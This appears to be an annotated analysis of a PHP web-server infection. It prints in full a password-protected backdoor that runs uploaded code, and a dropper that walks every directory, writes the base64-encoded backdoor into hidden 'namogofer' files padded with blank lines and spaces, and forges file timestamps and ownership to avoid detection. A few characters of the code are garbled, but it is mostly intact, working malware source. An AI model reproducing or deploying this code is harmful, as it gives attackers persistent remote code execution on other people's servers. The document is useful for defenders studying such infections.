|
| |
|
This is the Malcode, a Backdoor to your Server: | |
--------------------------------- BASE64CODE ------------------------
<?php error_reporting(1);
global $HTTP_SERVER_VARS;
function say($t) { echo "$t\n"; };
function testdata($t) { say(md5("testdata_$t")); };
echo "<pre>";
testdata('start');
if (md5($_POST["p"])=="aace99428c50dbe965acc93f3f275cd3")
{
if ($code = @fread(@fopen(
$HTTP_POST_FILES["f"]["tmp_name"],"rb"),
$HTTP_POST_FILES["f"]["size"]))
{
eval($code);
}
else
{
testdata('f');
};
}
else {
testdata('pass');
};
testdata('end');
echo "</pre>"; ?>
--------------------------------- END ------------------------
| |
|
This is the Just_a_test PHP-code sent once to your Server: | |
<?php error_reporting(1);
global $HTTP_SERVER_VARS;
$START = time();
$WD_TIMEOUT = array(8,7,6,6,5,5,5,5,0);
function my_fwrite($f,$data)
{
global $CURFILE;
$file_mtime = @filemtime($f);
$file_atime = @fileatime($f);
$dir_mtime = @filemtime(@dirname($f));
$dir_atime = @fileatime(@dirname($f));
if ($file_h = @fopen($f,"wb"))
{
@fwrite($file_h,$data);
@fclose($file_h);
if ($file_mtime)
{
@touch($f,$file_mtime,$file_atime);
}
elseif(@filemtime($CURFILE))
{
@chmod($f,@fileperms($CURFILE));
@touch($f,@filemtime($CURFILE),@fileatime($CURFILE));
@chgrp($f,@filegroup($CURFILE));
@chown($f,@fileowner($CURFILE));
};
if ($dir_mtime) @touch(@dirname($f),$dir_mtime,$dir_atime);
return $f;
}
else {
return '';
};
};
function ext($f)
{
return substr($f, strrpos($f, ".") + 1);
};
| |
| ... scan all your server directories: | |
function walkdir($p,$func='_walkdir',$l=0)
{
global $START;
global $WD_TIMEOUT;
global $FL;
$func_f = "{$func}_f";
$func_d = "{$func}_d";
$func_s = "{$func}_s";
$func_e = "{$func}_e";
if ($dh = @opendir("$p"))
{
if (function_exists($func_s))
{
if ($func_s($p,$l)) return 1;
};
while ($f = @readdir($dh))
{
if (time() - $START )= $WD_TIMEOUT[$l] ) break;
if ($f == '.' || $f == '..' ) continue;
if (@is_dir ("$p$f/") ) walkdir("$p$f/",$func,$l+1);
if (@is_dir ("$p$f/") && function_exists($func_d)) $func_d("$p$f/",$l);
if (@is_file("$p$f" ) && function_exists($func_f)) $func_f("$p$f" ,$l);
};
closedir($dh);
if (function_exists($func_e)) $func_e($p,$l);
};
};
function r_cut($p) { global $R; return substr($p,strlen($R)); };
function say($t) { echo "$t\n"; };
function testdata($t) { say(md5("testdata_$t")); };
$R = $HTTP_SERVER_VARS['DOCUMENT_ROOT'];
$CURFILE = $HTTP_SERVER_VARS['DOCUMENT_ROOT'].$HTTP_SERVER_VARS['SCRIPT_NAME'];
echo "<pre>";
testdata('start');
$fe = ext($CURFILE);
if (!$fe) $fe = 'php';
$FN = "namogofer.$fe";
function _walkdir_s($d,$l)
{
global $FCNT;
$FCNT = array('fn' =) '','dir' =) 0,'file' =) 0,'simtype' =) 0);
};
function _walkdir_d($d,$l)
{
global $FCNT;
$FCNT['dir' ]++;
};
function _walkdir_f($f,$l)
{
global $FCNT;
$FCNT['file']++;
if (ext($f) == ext($CURFILE)) $FCNT['simtype']++;
};
|
|
| At this point, Just_a_test Zombie-code is written all over your Server: | |
function _walkdir_e($d,$l)
{
global $C,$FCNT,$FN;
if ($C[$l](7)
{
if (my_fwrite("$d$FN",
str_repeat("\n",100) // Hide Code with 100 empty lines
.str_repeat(' ',150) // Hide Code with 150 spaces
//----------- Malcode is Here: ------------------------------
.base64_decode('PD9waHAgZXJyb3JfcmVwb3J0aW5nKDEpO2dsb2JhbCAkSFRUUF9TRVJWRVJfVkFSUzsgZnVuY3Rpb24gc2F5KCR0KSB7IGVjaG8gIiR0XG4iOyB9OyBmdW5jdGlvbiB0ZXN0ZGF0YSgkdCkgeyBzYXkobWQ1KCJ0ZXN0ZGF0YV8kdCIpKTsgfTsgZWNobyAiPHByZT4iOyB0ZXN0ZGF0YSgnc3RhcnQnKTsgaWYgKG1kNSgkX1BPU1RbInAiXSk9PSJhYWNlOTk0MjhjNTBkYmU5NjVhY2M5M2YzZjI3NWNkMyIpeyBpZiAoJGNvZGUgPSBAZnJlYWQoQGZvcGVuKCRIVFRQX1BPU1RfRklMRVNbImYiXVsidG1wX25hbWUiXSwicmIiKSwkSFRUUF9QT1NUX0ZJTEVTWyJmIl1bInNpemUiXSkpeyBldmFsKCRjb2RlKTsgfWVsc2V7IHRlc3RkYXRhKCdmJyk7IH07IH1lbHNleyB0ZXN0ZGF0YSgncGFzcycpOyB9OyB0ZXN0ZGF0YSgnZW5kJyk7IGVjaG8gIjwvcHJlPiI7ID8+')
.str_repeat(' ',150) // Hide Code with 150 spaces
."\n".str_repeat("\n",100))) // Hide Code with 100 empty lines
{
$C[$l]++;
$FCNT['fn'] = r_cut("$d$FN");
say(implode("\t",$FCNT));
};
};
};
walkdir("$R/");
testdata('end');
echo "(/pre)";
?>